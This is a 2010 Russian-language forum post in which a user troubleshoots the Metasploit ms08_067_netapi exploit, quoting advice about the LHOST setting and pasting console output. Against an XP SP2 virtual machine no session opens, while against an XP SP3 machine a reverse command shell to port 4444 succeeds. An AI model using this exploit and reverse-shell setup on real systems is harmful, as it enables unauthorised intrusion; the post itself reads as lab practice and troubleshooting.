Показать сообщение отдельно

  #6  
Старый 07.06.2010, 17:45
Аватар для Ru}{eeZ
Ru}{eeZ
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872

Репутация: 186
Отправить сообщение для Ru}{eeZ с помощью ICQ
По умолчанию

Цитата:
Сообщение от overxor  
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.

Измени на ip адрес совей Ubunt'ы
Спасибо, теперь получилось)

Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:
Код:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Russian[*] Selected Target: Windows XP SP2 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Exploit completed, but no session was created.
Атакую юзаемый Windows XP SP3 - атака проходит:
Код:
[*] Started reverse handler on 172.31.47.208:4444 [*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian[*] Selected Target: Windows XP SP3 Russian (NX)[*] Attempting to trigger the vulnerability...[*] Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010

Microsoft Windows XP [������ 5.1.2600]
(�) ��௮����� ����������, 1985-2001.

C:\WINDOWS\system32>
Почему так может быть?
 
Ответить с цитированием